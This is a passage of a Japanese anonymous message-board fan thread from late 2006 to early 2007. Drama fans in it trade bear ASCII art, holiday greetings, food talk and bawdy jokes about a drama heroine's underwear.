まだ気が治まらなかったら
/ ー ー | 漏れを殴れ!
ダッチクマーもやった身にゃサンドバッグマーも平気だぜ

163 :壁に耳あり、障子にメアリーさん:2006/12/11(月) 00:58:23
ニセタンにしみじみして、憂さ晴らしの対象をいろいろ探したが
殴るのにおすすめのものなんてなかなかないものよね
まあでも、これなら心おきなくというものを見つけてきたわw
ちと、貼るのにどうかと思わないわけではないけど・・・
やっつけておくれなまし

164 :壁に耳あり、障子にメアリーさん:2006/12/11(月) 01:08:28
チンポゴキブリ【ちんぽごきぶり】

         /⌒\
        (    )
        |   |
        |   |
     / ̄(* ω 。) 
      ~ヽ ̄ヽヽ ヽ


165 :壁に耳あり、障子にメアリーさん:2006/12/11(月) 01:47:30
/  ●   ● |   癒されるクマー

166 :壁に耳あり、障子にメアリーさん:2006/12/11(月) 01:55:49
>>165
藻舞の感性に乙!w
気に入ってくれたのかw

167 :壁に耳あり、障子にメアリーさん:2006/12/11(月) 02:07:26
ほれ、ホットココア
  ∬
つ(□
これ飲んでもうねんねしなまし
弱火の鍋でゆっくりミルクで練り伸ばしてくとおいしいんだよ
今度一人でまたーり作ってミソw もや〜

168 :壁に耳あり、障子にメアリーさん:2006/12/11(月) 08:43:45
>>165
ち○ぽごきぶり に癒されるクマーw
クマー、藻舞って奴は・・・www

169 :壁に耳あり、障子にメアリーさん:2006/12/11(月) 18:58:35
もめん、167です
いきなりミルクで伸ばしちゃだめです
最初はお湯ですw

170 :壁に耳あり、障子にメアリーさん:2006/12/11(月) 20:58:39
もうちょっとかな〜
フレーフレークマー

171 :壁に耳あり、障子にメアリーさん:2006/12/12(火) 22:30:52

   ◇       ミ ◇
   ◇◇   / ̄|  ◇◇ バサバサ
 ◇◇ \  |__| ◇◇  
    彡 O(,,・(ェ)・)/   クマクマクマ
       (  v `O     クマックマーン
      /彡#_|ミ\
       </」_|凵_ゝ    

172 :壁に耳あり、障子にメアリーさん:2006/12/12(火) 22:36:27
    曰   
  .   | |   
    ノ__ヽ  純米酒
    ,|美||  美少年
    ||少||
    ||年||
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

173 :壁に耳あり、障子にメアリーさん:2006/12/13(水) 00:11:35
クマー、あっちでグチってなかった?w

174 :壁に耳あり、障子にメアリーさん:2006/12/13(水) 10:34:05
クマーは台湾系はどうなの?

175 :壁に耳あり、障子にメアリーさん:2006/12/13(水) 19:40:28
/  ー   ー |   愚痴ってないwここで愚痴って後悔してる
            みんなスマン
            台湾は見て茄子最近深夜はロム専だ
            純米酒はずれてるので飲んだものか1日考えてるw

176 :壁に耳あり、障子にメアリーさん:2006/12/13(水) 20:29:05
www

177 :壁に耳あり、障子にメアリーさん:2006/12/13(水) 20:29:45
へたぴでずれたorz深い意味はないからw

誰も深追いしないから(ここはそういうとこでそ)忘れて栗
飲んで
っ曰
お薬は何も入ってません!からw

178 :壁に耳あり、障子にメアリーさん:2006/12/13(水) 21:46:45
つ曰

ツマミモヨコセw

179 :壁に耳あり、障子にメアリーさん:2006/12/13(水) 22:08:32
はいよっwww



      ∩─ー、       ∩─ー、       ∩─ー、
    / ● 、_ `ヽ   / ● 、_ `ヽ    / ● 、_ `ヽ
   /  ( ●  ● |つ /  ( ●  ● |つ /  ( ●  ● |つ
   |  /(入__ノ   ミ |  /(入__ノ   ミ |  /(入__ノ   ミ
   ' 、 (_/    ノ'' 、 (_/    ノ'' 、 (_/    ノ''    /
 /  \___ ノ゙   \___ ノ゙    \___ ノ゙   /
 | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|  /
 |         大クマ焼き  6個300円            .|/


180 :壁に耳あり、障子にメアリーさん:2006/12/13(水) 22:44:03
>>172
名前からして旨そーな酒じゃまいか
ワタスにも一杯下さい。

181 :壁に耳あり、障子にメアリーさん:2006/12/13(水) 22:54:56
>>180どぞ
熊本の清酒です。甘口です。やや辛の美青年があればねえw
皆さんもクマーとご一緒に っ曰曰曰曰曰

182 :壁に耳あり、障子にメアリーさん:2006/12/13(水) 23:01:56
ホントにあるんだ、クマーせんせに献上するため
にヲタが創ったもんだとばかり・・
いただきます、つ曰

183 :壁に耳あり、障子にメアリーさん:2006/12/13(水) 23:26:16
ではあたくしもいただきます つ曰

184 :壁に耳あり、障子にメアリーさん:2006/12/14(木) 00:40:03
忘年会でたらふく飲んできたけどいただくよ
つ曰

185 :壁に耳あり、障子にメアリーさん:2006/12/14(木) 00:58:13
>>175
/ ー ー |って
一瞬漏れか!?と思ったジャマイカw

ニセも一杯いただきまつ つ曰

186 :壁に耳あり、障子にメアリーさん:2006/12/14(木) 01:45:48
 /  ●   ● |    ニセの方が小顔・・・・・・・。

美少年は甘口なのかw
後になって他の酒飲んだ時に、他の酒の辛さを感じながら
美少年の甘さを想うのか
美少年を飲んでる時には甘さをもてあましそうだぬ
酒も男もほろ酔い程度がいいのかのぉ
結局どちらも最終的に向き合うのは自分なんだがな・・

187 :壁に耳あり、障子にメアリーさん:2006/12/14(木) 03:32:48
>>186
さすがクマー!
男を酒と比喩しとる
感慨深いお言葉です

188 :壁に耳あり、障子にメアリーさん:2006/12/14(木) 07:41:36
>>186
若い頃は全く気にならなかったのに、
今飲むと妙に引っ掛かり、後味悪く感じる酒もある。
クセがあって飲めなかったのに、
自分も年を経て、初めてその味わい深さを感じる酒もある。
極端に酒の味が変わる、というよりは、
飲む自分の心の在様が、時と共に変化するんだな、きっと。
冷静にじっくり構えて見極めるんだ、クマー!

189 :壁に耳あり、障子にメアリーさん:2006/12/14(木) 13:18:54
>>175
愚痴ったって いいジャマイカ クマーだもの
@みつを

190 :壁に耳あり、障子にメアリーさん:2006/12/14(木) 15:50:35
みつを〜〜
オマイもクマーヲタかよw

191 :壁に耳あり、障子にメアリーさん:2006/12/14(木) 23:47:15
下戸だから参加できないよ〜orz

192 :壁に耳あり、障子にメアリーさん:2006/12/15(金) 06:36:24
>>191
つc□~ 珈琲or紅茶

193 :壁に耳あり、障子にメアリーさん:2006/12/15(金) 16:51:45
>>192
d!紅茶いただきまつ つc□~
クマーヲタの忘年会w

194 :壁に耳あり、障子にメアリーさん:2006/12/16(土) 00:38:05
|)_○
|ェ)・) もういいかい・・・


195 :壁に耳あり、障子にメアリーさん:2006/12/16(土) 00:47:22
|
|_○  >>>>し〜〜ん・・・

196 :壁に耳あり、障子にメアリーさん:2006/12/16(土) 00:51:34
|)_○
|ェ)・) だるまさんがころんだ・・・

197 :壁に耳あり、障子にメアリーさん:2006/12/16(土) 00:57:22
 ○_○
(・(ェ)・) こめなしたんがにじかいた!

198 :壁に耳あり、障子にメアリーさん:2006/12/16(土) 01:05:29
おっ!コクマーお知らせ乙!
逝ってくるノシ

199 :壁に耳あり、障子にメアリーさん:2006/12/16(土) 01:14:44
|)_○
|×)*)  くまーがへをこいた・・・

200 :壁に耳あり、障子にメアリーさん:2006/12/16(土) 16:42:24

        ∫∫   ) ;:)
    ○,,○ <⌒>  (;; 从       失言したクマー
   (,,・(エ)・) /    ( ;;从从     おわびするクマー
   (    つ    从 ;; 从从.
    u―u'      //、从イヘヘ
             @ミ ミ;; ヘミイ`へ


201 :壁に耳あり、障子にメアリーさん:2006/12/17(日) 21:29:03
師走でみんな忙しいの?

202 :壁に耳あり、障子にメアリーさん:2006/12/18(月) 00:05:53
ひといなくて、淋しいね

203 :壁に耳あり、障子にメアリーさん:2006/12/18(月) 00:10:08
クマーがいないんだもん

204 :壁に耳あり、障子にメアリーさん:2006/12/18(月) 00:17:07
クマーはいると思うw
大抵はいるなと思ってるよw
手土産の虹がないし、はしゃぐ気分じゃないんじゃない?

205 :壁に耳あり、障子にメアリーさん:2006/12/18(月) 01:35:46
ノシ
鋭いw

206 :壁に耳あり、障子にメアリーさん:2006/12/18(月) 23:17:31
誰かBaseBallBaerって知ってる?
東京プリンでちらっと見たとき中の人に似てる気がしたんだけど
ぐぐってもはっきり顔がわかる写真が出てこないorz

207 :壁に耳あり、障子にメアリーさん:2006/12/18(月) 23:44:45
BaseBallBaer…BB…ん!?
我がチームのマスコットクマーじゃん!
と思った漏れはヒグマーw

>>206タソ、役に立てずにスマンorz

208 :壁に耳あり、障子にメアリーさん:2006/12/18(月) 23:54:17
ブサでなかったらw好きになるかもなのだ
バンドのカラーとか奴が好きな音楽がフムフムというかんじで
そしてなにより若い!w

209 :壁に耳あり、障子にメアリーさん:2006/12/19(火) 01:08:50
クマー、恥ずかしがってるのけ?

210 :壁に耳あり、障子にメアリーさん:2006/12/19(火) 01:24:31
>>207
答えてくれてありがとね

211 :壁に耳あり、障子にメアリーさん:2006/12/19(火) 20:13:07
某所にバーカバーカタソがいたw

212 :壁に耳あり、障子にメアリーさん:2006/12/19(火) 21:47:01
そういえば最近クマー、バーカバーカ言われてないね
クマーひそかに待っていそうw

213 :壁に耳あり、障子にメアリーさん:2006/12/20(水) 01:59:38
>>211
ここ以外で バーカバーカ 言ってたのけ? w
バーカバーカタソのツンデレっぷりがカバエエんだよなぁw

214 :壁に耳あり、障子にメアリーさん:2006/12/20(水) 04:19:03
Bearのつづりorz207たんにまで迷惑かけてすまそ
こんな変な時間に起きてしまったのはそのせいなのか!?w


215 :壁に耳あり、障子にメアリーさん:2006/12/20(水) 19:59:47
BSでアニメ見る?

216 :壁に耳あり、障子にメアリーさん:2006/12/21(木) 00:24:42
声だけじゃいや〜んw
だから見ない

217 :壁に耳あり、障子にメアリーさん:2006/12/21(木) 00:34:02
すごくエロイ声だったよw
あっという間の数分だったけど

218 :壁に耳あり、障子にメアリーさん:2006/12/21(木) 01:03:12
クマー、大掃除はいつ?

219 :壁に耳あり、障子にメアリーさん:2006/12/21(木) 19:16:06
忙しそうなクマーに

つ松居和代&松居棒

220 :壁に耳あり、障子にメアリーさん:2006/12/21(木) 20:56:06
洩れの家にもきて欲しいw
サンタクロースより松居和代がありがたいw

221 :壁に耳あり、障子にメアリーさん:2006/12/21(木) 22:39:45
>>217
エロイ声でなんて言うの?

222 :壁に耳あり、障子にメアリーさん:2006/12/21(木) 22:51:47
エロイ事は言わなかったよw

223 :壁に耳あり、障子にメアリーさん:2006/12/22(金) 01:38:10
                i        
      、   +    i!        
      i,`ヽ、     i |       おとぼけクマー復活祈願 
      i   丶、  ,i :|
       i;::_,、-、○ ○,.  +
      -'‐'"1i (・(ェ)・)__     
       ヽ:::|| |⊂ |、‐'" '`‐、     

        ヽ|i!r'とノ       \     コクマー以外と大人なりよ
     +   W'" ̄''‐-、_.     \      クマーふんばるなり
       +        `''‐-――一     


224 :壁に耳あり、障子にメアリーさん:2006/12/23(土) 00:12:25

    ___ ○,,○
    ___(・(エ)・)< ヲタどこ〜・・・
    __ /⊃三つ     
    _○′ / \     ・・・・栗熊には来る?
    _ ∪ ∪    \
       ◎ ̄ ̄ ̄ ̄◎


225 :壁に耳あり、障子にメアリーさん:2006/12/23(土) 02:32:18
コクマー、いるよノシ
大掃除は今年はしないw

226 :壁に耳あり、障子にメアリーさん:2006/12/23(土) 02:39:48
レスまりがとん
実は一度寝たのにまた起きてしまったとこw
洩れのダメなとこさみしがりのとこねw
クマーがAAしなくても、いるのがわかってるからついにぎやかしに走ってしまうなり
クマーもヲタも好きだからさー

227 :壁に耳あり、障子にメアリーさん:2006/12/23(土) 03:27:43
大掃除は他のヲタさんに返してあげねばw
コクマーはおむすび、ちんごき、美少年、BBB,BSほか
よくお返事いただいてます。これからもまたーりよろしゅう!

228 :壁に耳あり、障子にメアリーさん:2006/12/23(土) 14:16:34
米梨タソは絶対消しゴム見たなw

229 :壁に耳あり、障子にメアリーさん:2006/12/23(土) 15:36:47
ミンチョルクマーに姫だっこはむりぽorz
やっとこさおんぶw
それもヨンスクマーの皮を被った二人羽織状態だもんww

230 :壁に耳あり、障子にメアリーさん:2006/12/23(土) 15:41:20
クマクマ二人羽織ww

231 :壁に耳あり、障子にメアリーさん:2006/12/23(土) 23:49:05
クマー!nhkすぐ見ろー!

232 :壁に耳あり、障子にメアリーさん:2006/12/24(日) 00:28:10
ヨンスクマーの誕生日は24それとも25?
クリスマスって言ってたから25でいいのかな?

233 :壁に耳あり、障子にメアリーさん:2006/12/24(日) 00:50:07
        :☆:
      ..::* ◎.。
     ..::彡彳*‡:*..
    .:+彡*★:ミ:♪:ミ。:.,      
   .:彡'゜‡,※゜.◎::▲:ミ,::..
  .,;彡*;▲彡゜*★::.ミ~:ミ+:..
 ..*彡゜◎.从♪.:ミ,☆,゜〓:ミ:,,
 .:彡★*..☆,彡.:◆.ミ.+:◎,ミ。:..
.:゜:彡彡彡彡彡彡ミミミミミミミミ::.
      .,,,;┃┃;,,,.     
     ;■■■■;       
       ■■■        
     ..;■■■;...     

234 :壁に耳あり、障子にメアリーさん:2006/12/24(日) 02:11:58
>>232
25日のはず

235 :壁に耳あり、障子にメアリーさん:2006/12/24(日) 03:55:26

     ○,,○    カキカキ
    (,,・(ェ)・)
   ノ つ_φ))____   新しいバイと始めたなり〜
旦 ̄\        \    このごろの子は受験勉強が忙しいから
      ̄ ̄ ̄ ̄ ̄ ̄      作文はスルーするが基本なんだって


236 :壁に耳あり、障子にメアリーさん:2006/12/24(日) 04:41:46
ガキに代わって作文書く仕事なのか!?
そんな甘ったれたふざけたガキはブっ飛ばしてやりたい

237 :壁に耳あり、障子にメアリーさん:2006/12/24(日) 11:42:17
わったしの、わったしのコクマーは、左きき〜?

238 :壁に耳あり、障子にメアリーさん:2006/12/24(日) 13:28:58
>>231
今北コーポレーション
チョンホ様見たよ!!お知らせd!
>>233
ツリーd!田舎なのできれいなイルミネーションも見れない
ので嬉しい〜

コクマー、クマーも忙しいから虹をかわりに描くバイトも汁!w
ぶっ飛ばされそうだが・・
でもそのバイトはオレもやりたいw
昔彼氏のレポートかわりに書いて、本人の普段の評価より
悪い点数もらったことあるw

>>237は鋭いw

239 :壁に耳あり、障子にメアリーさん:2006/12/25(月) 00:00:16
※・*・※・*・※・*・※・*・※・*・※・*・※・*・※・*・※・*・※・*

       /⌒\、__/⌒ ̄}
       \__(__)__/
      〃〓/ ̄ ><  ̄\〓〃
     ミ☆/:::(:::: ::::)::: >☆彡
   ★≡〃\/ 〉:: ::〈\/  ≡〃★
  ●※○      ^^^^^     ○※●
 〃≡★  Merry Christmas  ★≡〃
  ☆〓                 〓☆
  〃≡★       (;)      ★≡〃
   ●※○-  ,_】【_,  ,-○※●
     ★〃≡〓  ○  〓≡〃★
        ミ☆-★※★-☆彡
             ●


 .    Λn        п
     /|田|||★     几
   {:~:~:~:~:~:~:~:~:}  |::::|
   {゜。゜。゜。゜。゜}  .|::::| ▼ ▼
    ^^^^^^^^^^^^    ̄  ⊥ ⊥
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

240 :壁に耳あり、障子にメアリーさん:2006/12/25(月) 00:17:45

○⌒\
 (二二二)    ▼   メリークリクマー!
. (*・(ェ)・)つ⊥

241 :壁に耳あり、障子にメアリーさん:2006/12/25(月) 01:49:10
        / ̄ \
    __0⌒>   ヽ
   /   ∩⊂ニニニ⊃∩
 /     | ノ      ヽ  
|     /  ●   ● |   
|     |    ( _●_)  ミ   メリクマ
|    彡、   |∪|  、`\
|   / __  ヽノ /´>  )
 \  (___)   / (_/
   \   |      /
     ̄ ̄|  /\ \
       | /    )  )
       ∪    (  \
             \_)


242 :壁に耳あり、障子にメアリーさん:2006/12/25(月) 02:12:05
明日の午後クマー

243 :壁に耳あり、障子にメアリーさん:2006/12/25(月) 02:42:25
虹をかわりに描くバイトしようとして今の今まで必死でガンガッタなりよ
ラストシーンを描くとこだったなりよ
突然強制修了されて消えたなり〜
  〇_〇
。・゚・(ノ(ェ)`)・゚・。うぇぇぇ       
へたぴ虹でも勇気を出して一生懸命描いたのに、クマーがお休みだから
コクマーがプレゼントしたかったのに、なくなってしまったなり
きっとウイルスの仕業なりよ
へたぴでもコクマーはコクマー独自の栗熊にじができたとおもたのにい
  〇_〇
。・゚・(ノ(ェ)`)・゚・。うわーんー
というわけでPCを叩きなおしてやらねばならなくなってしもうた
ところで何度もにじを描くこと勧められたけれど、全部クマーなの?
て、実はそんなことより消えたにじが惜しくてたまらないなり〜orz

244 :壁に耳あり、障子にメアリーさん:2006/12/25(月) 08:57:47
/ *●  ●* |ノシ メリーニセクマー!

…あり?出遅れてる?…お呼びじゃない!?
そいつは失礼いたしますたー!

245 :壁に耳あり、障子にメアリーさん:2006/12/25(月) 09:07:30
泣くなコクマー
PC作業の途中でのフリーズ・強制終了って
悲しくて呆然となってヤル気無くなるよなワカルヨー
またその気になったら
前に書いたの思い出しながら挑戦してみて!
ガンガレ!コクマー!
っていうかクマーもガンガレ!ww

246 :壁に耳あり、障子にメアリーさん:2006/12/26(火) 07:54:45
クマーはおせち作るの?
一番好きなおせちはなあに?

247 :壁に耳あり、障子にメアリーさん:2006/12/26(火) 13:20:01
おせちはママンが作るw
好きなのは栗きんとん!

248 :壁に耳あり、障子にメアリーさん:2006/12/26(火) 14:39:06
/ ●  ● |人(・∀・) 栗きんナカーマw
つまみ食いがついついやめられない〜

249 :壁に耳あり、障子にメアリーさん:2006/12/26(火) 16:29:19
毎年中華料理屋の豪華お節も注文する
酒の肴にぴったりw

250 :壁に耳あり、障子にメアリーさん:2006/12/26(火) 18:10:48
う、美味そーだぬ〜〜>豪華中華おせち
食った事ないがウトーリする響きだぞw(*´∀`*)ポワワーン
やはり
北京ダック・ふかひれ・上海カニ・ツバメの巣
あたりが入ってるの?
餃子や麻婆豆腐は庶民派メニューだから入ってないかw

251 :壁に耳あり、障子にメアリーさん:2006/12/26(火) 18:30:42
おせちじゃないが毎年元旦は夫の実家の面々とホテルで豪華中華を食べることになっている
料理は美味いが禿しくツマランorz

252 :壁に耳あり、障子にメアリーさん:2006/12/26(火) 19:09:46
漏れが>>251タソに代わって行ってやる!
へーそーなんですかぁ
あらやだぁお義母さんw
とテキトーに相槌打ちながら美味しいメシ食えるなら
お安い御用だぜっw

253 :壁に耳あり、障子にメアリーさん:2006/12/26(火) 19:35:43
中華お節で美味いNO.1はキュウリの中華漬け
普段スラムな生活してるので口が・・・orz

254 :壁に耳あり、障子にメアリーさん:2006/12/26(火) 23:30:22
わかる…オイチイよねw>きゅうり中華漬け
きゅうりときくらげの和え物もウマー

255 :壁に耳あり、障子にメアリーさん:2006/12/28(木) 00:50:44
ノシ やあ!

256 :壁に耳あり、障子にメアリーさん:2006/12/28(木) 00:58:17
ノシ!潜伏中w

257 :壁に耳あり、障子にメアリーさん:2006/12/28(木) 02:59:28
>>241
>>242
wkkmしたおいらは勘違いくまだったのかorz

258 :壁に耳あり、障子にメアリーさん:2006/12/28(木) 15:16:58
>>252
荒修行か罰ゲームみたいなもんだぞw>食事会
個室なんで会話が止まったら静まりかえるしorz

ここのみんなと中華食いてぇよw

259 :壁に耳あり、障子にメアリーさん:2006/12/28(木) 18:43:22
>>258
メシ食うだけで荒修行罰ゲーム的とはorzだぬ
でも食い気に勝る漏れは258タソのお供したいw

260 :壁に耳あり、障子にメアリーさん:2006/12/28(木) 18:44:15
>>258
メシ食うだけで荒修行罰ゲーム的とはorzだぬ
でも食い気に勝る漏れは258タソのお供したいw

261 :壁に耳あり、障子にメアリーさん:2006/12/28(木) 20:20:12
>>260


     /\⌒ヽペタン
    /  /⌒)ノ ペタン
  ○,,○ \ (( ○,,○
 (,,    ))' ))(   ,,)
 /  ⌒ノ ( ⌒ヽ⊂⌒ヽ
.(O   ノ ) ̄ ̄ ̄()__   )
 )_)_) (;;;;;;;;;;;;;;;;;;;)(_(



262 :壁に耳あり、障子にメアリーさん:2006/12/28(木) 23:44:52

     /\⌒ヽペタン
    /  /⌒)ノ ペタン
  ○,,○ \ (( ○,,○
 (,,・(ェ)・))' ))(´・(ェ)・`)   初めて中の人の夢見ちった
 /  ⌒ノ ( ⌒ヽ⊂⌒ヽ          どきどきしたw
.(O   ノ ) ̄ ̄ ̄()__   )
 )_)_) (;;;;;;;;;;;;;;;;;;;)(_(


263 :壁に耳あり、障子にメアリーさん:2006/12/29(金) 00:18:40
>>262
そりはちょっと裏山w

264 :260:2006/12/29(金) 00:20:02
>>261 dw
もちついたw

ところでどんな夢だったの?

265 :壁に耳あり、障子にメアリーさん:2006/12/29(金) 00:40:24
(*・(ェ)・)コクマーに惚れてるのをクールな表情で隠そうとしていたなりね
コクマーが手をのばすと引っ張るようにしっかり握って
一緒に人並みを縫うように歩いたなりよ(∩(ェ)∩) 

266 :壁に耳あり、障子にメアリーさん:2006/12/29(金) 02:00:15

   〇,,〇          スルーかよっw
  ( ・(ェ)・)         めちゃ恥ずかしいじゃないかっ!      
   |(ノ  |つ          
  C:、..  ノ         
    U"U 


  〇,,〇
 (,,~(I)~) けど、頬を切る風が清清しく心がひとつだったなり〜         
 ( つ と     完璧イケメンでなかったとこも良かったなり〜
 と__)__)      少し青ざめて目が赤かった、そしてカオデカだったorz


267 :壁に耳あり、障子にメアリーさん:2006/12/29(金) 02:36:25
漏れはたまに中の人の夢を見る
全入の白トレンチ着てるのにコート脱いだらヨンスさんとペアの服orzだったり、
何故か漏れが女子高生wwwで学校まで迎えに来てくれたりさw


キモくてスマソw

268 :壁に耳あり、障子にメアリーさん:2006/12/29(金) 17:27:15
いやいやw中の人に萌えなオマイラがカワエエ
中の人の卒業間近なオレはorz

269 :壁に耳あり、障子にメアリーさん:2006/12/29(金) 21:45:48
工エエェェ(´д`)ェェエエ工
クマーなのけ!?

だったら禿悲すぃ〜〜・゚・(つД`)・゚・

270 :壁に耳あり、障子にメアリーさん:2006/12/30(土) 18:09:03
何だか気忙しい・・・

271 :壁に耳あり、障子にメアリーさん:2006/12/31(日) 03:00:45
クマーとクマヲタの皆様よいお年を〜ノシ

272 :壁に耳あり、障子にメアリーさん:2006/12/31(日) 23:53:11
        〇__〇
        (・(エ)・,,)      あとすこし・・・
        (∩∩)o

   \        /
  / ̄ ̄ /||
  r== r .|_
/`L_`L//|
l ̄ ̄ ̄ ̄ i


273 :壁に耳あり、障子にメアリーさん:2007/01/01(月) 00:00:13
        ∽∽∽∽∽∽∽∽∽     ,,,,.,.,,,,
   ∩    新年          §  /  ・ ヽヽ
 ∩∪     あけまして     §  ▼,__  |,|     クマーー!!!
 ∪.| |∩     おめでとう    >  ム((エ)・) ,|し   ヲターー!!!
. | |.| |∪        ございます  §   (|,, ,, 、)|
. | |.| |.| |                §    | ,, ,, |
(∩∩∩∩)    2007年元旦.  §    ヽ.__ノ○
(∪∪∪∪)  ∽∽∽∽∽∽∽∽      U"U
 |≡≡≡|
/≠≠≠\
~~~~~~~~~~~~


274 : 【豚】 【971円】 :2007/01/01(月) 13:58:08
おめ!
今年は精進!!
中の人は卒業しても室長初恋は忘れない!!!


275 :壁に耳あり、障子にメアリーさん:2007/01/01(月) 14:47:55
    ∧___∧
    | ノ      ヽ
   /  ●__● |   イノシシ──!!
   ミ  ∧(○ ○)∧ミ
  ミ  (ノ  |∪|  ノミ
  彡、    ヽノ 、`\
 / __     /´>  ) クマーとヲタのみんなおめー
 (___)   / (_/
  |       /
  |  /\ \
  | /    )  )
  ∪    (  \
        \_)



276 :壁に耳あり、障子にメアリーさん:2007/01/01(月) 17:32:42
| ●*|ノシ あけおめ ことよろ

277 :壁に耳あり、障子にメアリーさん:2007/01/01(月) 20:25:19
>>274=クマー?
新春早々中の人卒業宣言!?寂しいのぉorz
でも初恋室長おかずに練習虹は精進してね!

278 :壁に耳あり、障子にメアリーさん:2007/01/02(火) 03:58:50
>>274
ウレシスよ、今年はまたーり釣りを楽しむなり〜。でも、ヲタにお年玉I玉くれ!w

>>ヲタくま
今年もヨロクマー、くまたちめちゃ釣りタスw

>>2世
トンを忘れないなりよ、今年も縁あってギザウレシス!

279 :壁に耳あり、障子にメアリーさん:2007/01/04(木) 00:45:46
ヒグマー達「純愛中毒」始まりますよ〜

280 :壁に耳あり、障子にメアリーさん:2007/01/04(木) 13:12:27
^^

281 :壁に耳あり、障子にメアリーさん:2007/01/04(木) 13:58:41
>>279
dd。
DVD持ってるくせに録画したw@ヒグマー

282 :壁に耳あり、障子にメアリーさん:2007/01/04(木) 15:50:08
>>281
漏れも持ってるのに録画したw
さっき見たよ

283 :壁に耳あり、障子にメアリーさん:2007/01/04(木) 18:53:41
クマーとヲタのみんな良い正月過ごせますたかー?

284 :壁に耳あり、障子にメアリーさん:2007/01/04(木) 23:48:33
正月オワタ・・・orz

285 :壁に耳あり、障子にメアリーさん:2007/01/05(金) 00:21:53
正月終ったら花見がくるよ、元気出せ!

286 :壁に耳あり、障子にメアリーさん:2007/01/05(金) 00:37:41
クマーは今整形中なのけ?

287 :壁に耳あり、障子にメアリーさん:2007/01/05(金) 00:47:37
洩れの好きなここは残しておいて!
   ∩___∩    
    | ノ 
知的でそ
グレース・ジョーンズ(あってるかなあ?)みたいでそw
通じなかったらスマソw

288 :壁に耳あり、障子にメアリーさん:2007/01/05(金) 23:59:47
ロバートよりクマーのラムたんの方がかわえかったな

289 :壁に耳あり、障子にメアリーさん:2007/01/06(土) 01:27:02
ラムクマーは可愛かったなw
エロカワというよりは、ゆるカワって感じか?

290 :壁に耳あり、障子にメアリーさん:2007/01/06(土) 01:51:03
www

291 :壁に耳あり、障子にメアリーさん:2007/01/06(土) 12:35:56
どこがゆるいねんw

292 :壁に耳あり、障子にメアリーさん:2007/01/06(土) 15:03:32
@おつむ
A口
B財布のひも
Cおパンツのゴム
Dあそこ

293 :壁に耳あり、障子にメアリーさん:2007/01/06(土) 15:23:11
クマーはパンツはいてたか?w

Dか?Dなのか?

294 :壁に耳あり、障子にメアリーさん:2007/01/06(土) 16:43:37
クマヲタ的にはCが楽しいw
で、ゆるいからはいてないw

295 :壁に耳あり、障子にメアリーさん:2007/01/06(土) 17:21:10
ゆるパン→ノーパンクマー

296 :壁に耳あり、障子にメアリーさん:2007/01/06(土) 19:59:54
Bはまちがいなく違うな
スラムクマーw

297 :壁に耳あり、障子にメアリーさん:2007/01/06(土) 20:31:41
クマのパンツはゆるゆるパンツ
あげてもあげてもすぐ落ちる
がんばらなくっちゃ〜がんばらなくっちゃ〜かんばらなくっちゃー♪

298 :壁に耳あり、障子にメアリーさん:2007/01/06(土) 20:53:55
タブーに触れる真相その1

ヨンスさんも長いスラム生活で
パンツは落ちない程度にゆるゆるだった
イカ宿の帰りの車中ヨンスは思った
ゆるゆるでなければ私、許してしまっていたかも・・・

299 :壁に耳あり、障子にメアリーさん:2007/01/06(土) 21:14:13
確かに無駄毛処理してないときとかは断るもんな
男いないときはさぼりがちだな>オレw
ヨンスさんはいつでもOKだったはずないww

300 :壁に耳あり、障子にメアリーさん:2007/01/06(土) 21:29:00
>>298
へそまで隠れるグンゼのゆるパンだったの鴨
それは室長に身をゆだねられないなw

>>299
苦学生ヨンスクマーは
カミソリの刃が悪くなるのを恐れて
頻繁に毛処理は出来なかったんジャマイカ!?

301 :壁に耳あり、障子にメアリーさん:2007/01/06(土) 21:56:30
勝負下着より、何回も選択して使ってる下着や
ちょっとヲバテイストの方がスキがあってかわいいという男子結構いるよね
完璧すぎるとそのつもりだったのかよっwて引くこともあるらしい

302 :壁に耳あり、障子にメアリーさん:2007/01/06(土) 21:57:49
×選択
○洗濯

303 :壁に耳あり、障子にメアリーさん:2007/01/06(土) 22:04:20
真っ白グンゼゆるパンに萌える室長w

304 :壁に耳あり、障子にメアリーさん:2007/01/06(土) 22:33:18
>>303
だよなぁ
勝負下着より純白にみえる>ゆるゆるグンゼ

305 :壁に耳あり、障子にメアリーさん:2007/01/06(土) 22:38:06
そのうえ石鹸のかおりでもしようもんなら
ミンチョルクマーの鼻も広がるってか

306 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 00:38:09
石鹸の香りにクラッとしながら
グンゼ白パンに手を掛ける
ゆるいだけに抵抗無くスルリと下がり
白パンに劣らぬヨンスクマーの肌の白さが
ミンチョルクマーの目に飛び込んで来た
・・・ゆるパン最強w

307 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 01:17:25
でもほら、ヨンスクマーってスラム暮らししてたから
せっかくのゆるパンも純白じゃなくて
はきこんだアイボリーだったのかも・・・w

308 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 01:24:22
そのとおりだとおもうクマー
みんなが純白いうのが不思議だったクマー
漂白したら長持ちしないクマー

309 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 01:46:28
白ベージュ

310 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 01:49:03
ッワ!
白よりベージュが有力と思う
ブラとショーツだけは棍棒で叩かずゆるゆるお洗濯

311 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 01:51:40
ヨンスさん、室長のパンツも捨てられないんじゃw
「これ処分しておいて」と言われたものの
え、まだ履けるんじゃないかすぃら・・・と思い、ため込むため込む

312 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 02:00:35
うん、少しだけゴムがびよ―ンなパンツが風呂の脱衣所に
パジャマとともに几帳面にたたんであっってね
室長しばし見つめてはくよね
ヨンスクマーの笑顔見たら、処分しておいてなんてとっても言えないかもw
もう誰に見られることもないから、まっいいかってビールでも飲む?

313 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 02:04:29
内心ベージュゆるパンを確信しつつも
ヨンスさんには白パンを履いてて欲しかった漏れは
夢見るキモゴリラちっくだなw

314 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 02:12:02
そうかも!
カリアゲゴリラこそグンゼ白パンツフェチけてーい!
つか白パンツしか女にあらずみたいなw

315 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 02:12:05
